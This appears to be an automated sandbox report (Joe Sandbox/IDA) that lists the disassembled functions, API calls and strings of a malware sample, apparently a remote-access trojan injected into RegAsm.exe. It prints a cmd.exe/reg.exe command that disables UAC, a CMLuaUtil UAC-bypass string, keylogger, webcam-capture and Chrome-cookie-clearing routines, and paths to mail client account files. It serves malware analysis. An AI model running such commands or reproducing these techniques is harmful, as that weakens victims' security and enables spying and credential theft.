                                                                        • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                        APIs
                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                        • CoUninitialize.OLE32 ref: 00407629
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                        • API String ID: 3851391207-1839356972
                                                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                                                        Strings
                                                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                        • UserProfile, xrefs: 0040BAAD
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                        • API String ID: 2018770650-304995407
                                                                        • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                        • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 0043AC69
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                        • __allrem.LIBCMT ref: 0043AC9C
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                        • __allrem.LIBCMT ref: 0043ACD1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 1992179935-0
                                                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prologSleep
                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                        • API String ID: 3469354165-3054508432
                                                                        • Opcode ID: 2fdfd63980a66dc9589990656a3d546e0077080f775d45fe236281622e2144b7
                                                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                        • Opcode Fuzzy Hash: 2fdfd63980a66dc9589990656a3d546e0077080f775d45fe236281622e2144b7
                                                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe
                                                                        • String ID:
                                                                        • API String ID: 4189289331-0
                                                                        • Opcode ID: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                        • Opcode Fuzzy Hash: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 10001607
                                                                        • _strcat.LIBCMT ref: 1000161D
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                        • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                        • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcatlstrlen$_strcat_strlen
                                                                        • String ID:
                                                                        • API String ID: 1922816806-0
                                                                        • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                        • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                        • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                        • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$AttributesFilelstrcat
                                                                        • String ID:
                                                                        • API String ID: 3594823470-0
                                                                        • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                        • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                        • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                        • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                        • String ID:
                                                                        • API String ID: 493672254-0
                                                                        • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                        • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                        • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                        • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                        • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                        • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                        • _free.LIBCMT ref: 0044824C
                                                                        • _free.LIBCMT ref: 00448274
                                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                        • _abort.LIBCMT ref: 00448293
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                        • _free.LIBCMT ref: 10005B2D
                                                                        • _free.LIBCMT ref: 10005B55
                                                                        • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                        • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                        • _abort.LIBCMT ref: 10005B74
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                        • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                        • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                        • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
Strings
Memory Dump Source
• Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
APIs
• GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
• wsprintfW.USER32 ref: 0040B1F3
  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
• API String ID: 1497725170-248792730
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0;U
• API String ID: 0-4237915841
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
• Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
• CloseHandle.KERNEL32(00000000), ref: 0040A6EE
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: XQG
• API String ID: 1958988193-3606453820
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
• CloseHandle.KERNEL32(?), ref: 004077AA
• CloseHandle.KERNEL32(?), ref: 004077AF
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
• C:\Windows\System32\cmd.exe, xrefs: 00407796
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
• GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
• FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
• CloseHandle.KERNEL32(?), ref: 00405140
